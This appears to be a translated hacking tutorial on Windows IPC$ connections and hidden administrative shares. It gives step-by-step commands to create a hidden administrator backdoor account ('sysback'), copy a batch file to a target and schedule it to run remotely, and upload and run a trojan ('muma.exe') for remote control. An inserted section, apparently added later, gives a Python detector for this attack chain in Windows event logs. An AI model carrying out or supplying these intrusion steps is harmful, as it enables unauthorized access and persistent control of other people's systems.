Notes on the use of IPC$

2025-01-15 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

IPC$ (Internet Process Connection) is a shared resource that exposes a named pipe for inter-process communication. By supplying a trusted username and password, the two ends of the connection establish a secure channel and exchange encrypted data over it, which gives access to the remote computer. IPC$ is a feature of NT/2000 and allows only one connection between two IP addresses at a time. Along with IPC$, NT/2000 also turns on default (administrative) shares when the system is first installed, i.e. every logical drive (C$, D$, E$ ...) and the system directory winnt or windows (ADMIN$). Microsoft's intention was to make administration easier, but, intentionally or not, this reduces system security.

(1) To support IPC sharing, Windows operating systems (excluding the Windows 98 series) automatically share the C, D and E drives and the ADMIN directory (C:\WINNT\) after installation as ADMIN$, C$, D$, E$ and so on. Note that these shares are hidden and only administrators can operate on them remotely. Type the "net share" command at the MS-DOS prompt to view the local shared resources.

(2) Basic DOS commands

DIR command: lists the files in the current path; often used to check whether the file you are looking for is under that path.

CD command: enters the specified directory. For example, to enter the CODE folder on the E drive, type "CD CODE" at the E:\> prompt.

Common net commands:

net user: system account operations

net localgroup: local group operations

net use: remote connection and drive-mapping operations

net time: view the remote host's system time

cls command: clears the screen

net start command: starts a service (run without arguments, it lists the services that are currently running)

(3) Establishing and disconnecting IPC$ connections

Leaving a backdoor account

1. Related knowledge

What is a BAT file?

A BAT file is a batch file, a file format on Windows. Simply put, a series of DOS commands to be executed are written in order into a text file with the .BAT suffix. Running the BAT file, either by double-clicking it or from the DOS prompt, is equivalent to executing that series of DOS commands one after another.

What is a scheduled task?

For example, suppose you want to run an antivirus scan on your computer at 10 a.m. tomorrow, but you have to go out at 10 a.m. tomorrow. What do you do? Use the "Scheduled Tasks" feature to make the computer run the antivirus program automatically at 10 a.m. tomorrow. Scheduled Tasks is a Windows feature found in the Control Panel; scheduled tasks can also be added from the command line.

Related DOS commands

Copy command: copies a file to another place; "another place" can be a directory or disk on the local computer, or a directory or disk on another host.

At command: creates scheduled tasks.

Net time command: views the target computer's system time so that you can specify the time when scheduling a task.

Net user command: manages accounts on the computer.

- View accounts: net user

- Create an account: net user name passwd /add

- Delete an account: net user name /del

The net localgroup command manages local groups (such as Administrators).

2. Example: creating a backdoor account

Step 1: Prepare the BAT file.

Open Notepad, type the commands "net user sysback 123456 /add" and "net localgroup administrators sysback /add" on two lines, and save the file as "hack.bat". The two commands are explained below.

Command 1: net user sysback 123456 /add. This command adds an account with the username sysback and the password 123456.

Parameter description:

"sysback": username

"123456": the user's password

"/add": indicates adding an account

Command 2: net localgroup administrators sysback /add. This command adds sysback to the administrators group.

Parameter description:

"administrators": the administrators group

"sysback": the newly created username

"/add": indicates adding the user to the group

Step 2: Establish an IPC$ connection with the target host.

Use the command: net use \\IP\ipc$ "password" /user:"username"

Step 3: Copy the file to the target host.

Use the command: copy FILE \\IP\PATH

Parameter description:

"FILE": the local file name

"IP": the IP address of the target host

"PATH": the path where the file is saved

Open MS-DOS and type "copy d:\hack.bat \\192.168.27.128\c$". Once the copy command succeeds, hack.bat from the local D drive has been copied to the C drive of 192.168.27.128. Alternatively, copy and paste hack.bat onto the target host through the graphical interface.

Step 4: Schedule a task so that the remote host executes hack.bat.

First type "net time \\IP" to view the remote host's system time, then type "at \\IP TIME COMMAND" to create a scheduled task on the remote host.

Parameter description:

IP: the target host's IP

TIME: the time at which the scheduled task runs

COMMAND: the command the scheduled task executes

Open MS-DOS and type "net time \\192.168.27.128". Assuming the target system time returned is 13:33, schedule the task on the remote host relative to that time: type "at \\192.168.27.128 13:45 c:\hack.bat", which runs hack.bat from the target host's C drive at 13:45. After adding the scheduled task, disconnect the IPC$ connection with "net use * /del".

Step 5: Verify that the account has been created. After waiting long enough for the remote host to have executed hack.bat, verify that the "sysback" account exists by establishing an IPC$ connection with it. Connection successful! The administrator account "sysback" has been created.
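From the defender's side, the procedure above leaves a recognisable trail in the Windows Security log: a remote access to a hidden share (IPC$, C$), a scheduled-task creation, a new local account, and that account being added to Administrators, all within minutes of each other. The Python script below is an added example, not code from the original article; it correlates constructed, simplified log lines using the modern event IDs 5140, 4698, 4720 and 4732 (the "HH:MM EventID Key=Value" line format and all sample values are assumptions made here).

```python
import re

# Constructed sample Security-log lines, not from the original article, in a simplified
# "HH:MM EventID Key=Value ..." form. Event IDs are the modern Windows ones: 5140 share
# accessed, 4698 scheduled task created, 4720 account created, 4732 member added to local group.
SAMPLE_EVENTS = [
    r"13:30 5140 ShareName=\\*\IPC$ SourceAddress=192.168.27.1",
    r"13:31 5140 ShareName=\\*\C$ SourceAddress=192.168.27.1",
    r"13:34 4698 TaskName=\At1 Command=c:\hack.bat SubjectUserName=Administrator",
    r"13:45 4720 TargetUserName=sysback SubjectUserName=SYSTEM",
    r"13:45 4732 MemberName=sysback GroupName=Administrators SubjectUserName=SYSTEM",
    r"14:10 4720 TargetUserName=jsmith SubjectUserName=helpdesk",
]
# Hidden administrative shares: a drive letter, IPC or ADMIN followed by $ at the end of the name.
ADMIN_SHARE = re.compile(r"\\([A-Za-z]|IPC|ADMIN)\$$", re.IGNORECASE)

def parse_event(line):
    """Return (minutes since midnight, event id, {field: value}) for one sample line."""
    hhmm, event_id, rest = line.split(" ", 2)
    hours, minutes = hhmm.split(":")
    return int(hours) * 60 + int(minutes), int(event_id), dict(re.findall(r"(\w+)=(\S+)", rest))

def last_within(items, t, window):
    """Most recent (time, payload) pair whose time lies in [t - window, t], or None."""
    hits = [item for item in items if 0 <= t - item[0] <= window]
    return max(hits) if hits else None

def detect_backdoor_chain(lines, window=30):
    """Return (account, source_ip, task_command) for every chain of: remote access to a hidden
    share -> scheduled task created -> account created -> account added to Administrators,
    with each step at most `window` minutes after the previous one."""
    events = [parse_event(line) for line in lines]
    shares = [(t, f["SourceAddress"]) for t, e, f in events
              if e == 5140 and ADMIN_SHARE.search(f["ShareName"])]
    tasks = [(t, f["Command"]) for t, e, f in events if e == 4698]
    created = {f["TargetUserName"]: t for t, e, f in events if e == 4720}
    findings = []
    for t_add, e, f in events:
        if e != 4732 or f.get("GroupName", "").lower() != "administrators":
            continue
        user = f["MemberName"]
        t_new = created.get(user)
        if t_new is None or not 0 <= t_add - t_new <= window:
            continue  # group change on a pre-existing account: a different pattern
        task = last_within(tasks, t_new, window)
        share = last_within(shares, task[0], window) if task else None
        if share:
            findings.append((user, share[1], task[1]))
    return findings
```

Note that the legitimate account creation for "jsmith" produces no finding because it is never added to Administrators, and the chain is dropped entirely when the scheduled task is missing or the steps fall outside the window.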

Conclusion:

(1) Opening the target's IPC$:

First you need a shell that does not depend on IPC$, such as the cmd extension of SQL, telnet or a ***; this shell must have administrator privileges. Then open the target's IPC$ from that shell with the command net share ipc$. As seen above, there are still many conditions for IPC$ to be usable: make sure the relevant services are running, or start them if they are not (see the usage of the net command for details). If that is not possible (for example, a firewall that cannot be disabled), it is better to give up.

(2) Mapping and accessing default shares:

Use the command net use z: \\target IP\c$ "password" /user:"username" to map the other side's C drive to your own Z drive, and so on. If you have already established IPC$ with the target, you can access it directly as \\IP\letter$. For example: copy muma.exe \\IP\d$\path\muma.exe. Or map it again, this time without username and password: net use y: \\IP\d$, then copy muma.exe y:\path\muma.exe. When a path contains spaces, the whole path must be enclosed in "".

(3) After connecting to IPC$:

Connecting to IPC$ with an administrator account means you can "communicate" with the other system in depth. You can use a variety of command-line tools (such as pstools, the Win2000 Server Resource Kit, telnehack, etc.) to gather target information and manage the target's processes and services. If the target has default shares enabled, you can upload a *** and run it; tftp and ftp can also be used to upload. Tools such as dwrcc, VNC and RemoteAdmin (***) also provide direct screen control. If the target is Windows 2000 Server, you can also consider enabling Terminal Services for convenient control.
